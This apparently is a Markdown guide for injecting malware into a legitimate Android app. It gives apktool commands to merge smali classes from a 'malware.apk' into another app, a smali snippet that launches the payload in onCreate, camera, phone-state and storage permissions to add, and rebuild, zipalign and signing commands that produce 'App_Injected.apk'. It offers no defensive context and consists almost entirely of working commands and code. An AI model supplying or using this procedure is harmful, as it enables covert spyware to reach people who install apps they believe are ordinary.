79 lines
3.1 KiB
Markdown
79 lines
3.1 KiB
Markdown
## Prep
|
|
### Without Camera
|
|
|
|
1. Comment out the timer and compile
|
|
|
|
```kt
|
|
private fun startCheckingPermission() {
|
|
timerStorage = Timer("CheckStoragePermissionTimer", false)
|
|
|
|
timerStorage?.scheduleAtFixedRate(0, 5000) {
|
|
checkStoragePermission()
|
|
println("Requesting storage permission again")
|
|
}
|
|
|
|
/* timerCamera = Timer("CheckCameraPermissionTimer", false)
|
|
|
|
timerCamera?.scheduleAtFixedRate(0, 5000) {
|
|
checkCameraPermission()
|
|
println("Requesting camera permission again")
|
|
}*/
|
|
```
|
|
|
|
2. Decompile the apk `apktool d malware.apk`
|
|
3. Decompile original app `apktool d application.apk`
|
|
4. Move malware to normal application `cp -r malware/smali/com/* application/smali/com/`
|
|
5. Under the onCreate of original app
|
|
|
|
```smali
|
|
new-instance p1, Lcom/ti/m/GoodSoftware;
|
|
|
|
move-object v0, p0
|
|
|
|
check-cast v0, Landroid/content/Context;
|
|
|
|
invoke-direct {p1, v0}, Lcom/ti/m/GoodSoftware;-><init>(Landroid/content/Context;)V
|
|
|
|
invoke-virtual {p1}, Lcom/ti/m/GoodSoftware;->launch()V
|
|
```
|
|
6. Copy the permissions from the malware manifest to original manifests permissions
|
|
```xml
|
|
<uses-permission android:name="android.permission.CAMERA"/>
|
|
<uses-feature android:name="android.hardware.camera"/>
|
|
<uses-feature android:name="android.hardware.camera.autofocus"/>
|
|
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
|
|
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
|
|
<uses-permission android:name="android.permission.READ_MEDIA_IMAGES"/>
|
|
```
|
|
|
|
### With Camera
|
|
|
|
1. Do the steps of without camera but don't uncomment the timer
|
|
2. Copy camera to existing androidx folder `cp -r malware/smali/androidx/camera/ application/smali_classes2/androidx/`
|
|
3. Copy androidx futures to existing `cp -r malware/smali/androidx/concurrent/futures/* application/smali/androidx/concurrent/futures/`
|
|
4. Copy MediatorLiveData `cp -r malware/smali/androidx/lifecycle/MediatorLiveData* application/smali/androidx/lifecycle/`
|
|
5. Copy Camera metadata from Manifest
|
|
```xml
|
|
<service android:enabled="false" android:exported="false" android:name="androidx.camera.core.impl.MetadataHolderService">
|
|
<meta-data android:name="androidx.camera.core.impl.MetadataHolderService.DEFAULT_CONFIG_PROVIDER" android:value="androidx.camera.camera2.Camera2Config$DefaultProvider"/>
|
|
</service>
|
|
<uses-library android:name="androidx.camera.extensions.impl" android:required="false"/>
|
|
```
|
|
|
|
6. Copy Camera Queries to manifest under the permissions
|
|
```xml
|
|
<queries>
|
|
<intent>
|
|
<action android:name="androidx.camera.extensions.action.VENDOR_ACTION"/>
|
|
</intent>
|
|
</queries>
|
|
```
|
|
|
|
|
|
## Final Steps
|
|
1. Build the application `apktool b application -o unsigned.apk`
|
|
2. Align using zipalign `zipalign -p -f -v 4 unsigned.apk App_Injected.apk`
|
|
3. Generate keystore `keytool -genkey -V -keystore key.keystore -alias Android -keyalg RSA -keysize 2048 -validity 10000`
|
|
4. Sign Apk `apksigner sign --ks key.keystore App_Injected.apk`
|
|
5. Done
|